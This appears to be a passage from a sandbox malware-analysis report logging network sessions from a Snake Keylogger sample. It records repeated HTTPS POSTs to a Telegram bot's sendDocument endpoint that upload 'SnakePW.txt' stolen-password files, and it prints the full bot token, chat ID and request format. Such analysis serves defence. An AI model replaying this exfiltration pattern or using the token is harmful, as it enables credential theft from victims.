                                                                    2022-06-26 07:33:15 UTC144INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66842,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228795,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    86192.168.2.549928149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:15 UTC145OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ea7d9812
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:15 UTC145OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 61 37 64 39 38 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ea7d9812Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:15 UTC146INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:15 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:15 UTC146INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66843,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228795,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    87192.168.2.549931149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:16 UTC146OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756eabb954a
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:16 UTC147OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 61 62 62 39 35 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756eabb954aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:16 UTC147INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:16 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:16 UTC148INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66845,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228796,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    88192.168.2.549934149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:16 UTC148OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756eaf730d3
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:16 UTC148OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 61 66 37 33 30 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756eaf730d3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:16 UTC149INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:16 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:16 UTC149INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66846,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228796,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    89192.168.2.549936149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:16 UTC150OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756eb3c569c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:16 UTC150OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 62 33 63 35 36 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756eb3c569cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:17 UTC151INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:17 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:17 UTC151INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66847,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228797,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    9192.168.2.549777149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:41 UTC15OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d666ed16
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:41 UTC15OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 36 36 36 65 64 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d666ed16Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:42 UTC16INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:42 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:42 UTC16INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66755,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228762,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    90192.168.2.549937149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:17 UTC152OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756eb7a5109
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:17 UTC152OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 62 37 61 35 31 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756eb7a5109Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:17 UTC152INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:17 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:17 UTC153INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66848,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228797,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    91192.168.2.549938149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:17 UTC153OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ebbf7543
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:17 UTC154OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 62 62 66 37 35 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ebbf7543Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:18 UTC154INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:18 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
